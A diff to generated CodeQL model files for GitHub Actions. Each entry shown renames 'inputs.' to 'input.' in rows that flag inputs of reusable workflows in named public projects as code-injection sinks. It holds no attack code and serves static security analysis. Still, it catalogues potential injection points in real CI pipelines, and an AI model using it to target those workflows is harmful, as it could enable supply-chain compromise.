+++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.product-version", "code-injection", "generated"] - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.package-name", "code-injection", "generated"] - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goarch", "code-injection", "generated"] - - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.goarch", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index d8be4cc11b9..9e3fc5cdc4f 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml 
@@ -3,17 +3,17 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-max", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-name", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-edition", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-version", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.vault-edition", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.vault-version", "code-injection", "generated"] + - 
["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.go-arch", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.binary-tests", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index ad0943c3040..4cd6cd8f591 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "inputs.isStableRelease", "code-injection", "generated"] - - ["heroku/cli/.github/workflows/promote.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] + - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index e8c98ab4576..01726410e18 100644 
--- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.project_name", "code-injection", "generated"] - - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 00b45b50f88..90e61bcf11a 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] + - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index a5f35f3b737..b4e1ff8155a 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.windowsBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.bazelBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.iosBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.macosBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.androidBuildArgs", "code-injection", "generated"] - - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.bazelBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.iosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.macosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.androidBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index d0559519627..3621105b74e 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.package_name", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.hub_base_path", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.pr_number", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.commit_sha", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.languages", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.version_tag_suffix", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.additional_args", "code-injection", "generated"] - - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] \ No newline at end of file + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.hub_base_path", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.pr_number", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.commit_sha", 
"code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.languages", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.version_tag_suffix", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.additional_args", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index ec7b51abd8e..b6660df1c9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.folder_slices", "code-injection", "generated"] - - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.setup_status", "code-injection", "generated"] \ No newline at end of file + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index 92fd43bda75..ead0bcfab16 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.qt_version", "code-injection", "generated"] - - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.event_name", "code-injection", "generated"] \ No newline at end of file + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.event_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index ca550e4ddd7..6f9a12e9069 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ibm/sarama/.github/workflows/fvt.yml", "*", "inputs.kafka-version", "code-injection", "generated"] \ No newline at end of file + - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 580ac8bef0b..8ac32e4a7b7 100644 
--- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "inputs.icloudpd_version", "code-injection", "generated"] \ No newline at end of file + - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 463536e9693..3c21fcad386 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file + - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index 57bf30dc0cc..e0d2508932f 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "inputs.release-script-to-run", "code-injection", "generated"] \ No newline at end of file + - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index b7e49d46e1c..96830183506 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "inputs.image_tag", "code-injection", "generated"] \ No newline at end of file + - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 89257a02fcd..7f9299eb4d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "inputs._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file + - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index a645511766b..7a79d4c1e09 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index 1a7784c9f01..55888f48551 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "inputs.gradleVersion", "code-injection", "generated"] \ No newline at end of file + - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index ffb7a7d7d10..ea453ec4811 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.platform", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.image", "code-injection", "generated"] + - 
["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index 4ae93a83cd8..39005b693e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml 
@@ -3,21 +3,21 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.family", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.base_image", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.family", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.model", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.variant", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", 
"inputs.port", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file + - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.base_image", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.model", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", 
"input.variant", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "input.port", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index a63ddd5da67..4b485083191 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index e73d0d81875..f45709cfa0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml 
@@ -3,18 +3,18 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.repo", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.registry", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.repo", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.registry", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.repo", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.registry", "code-injection", "generated"] - - 
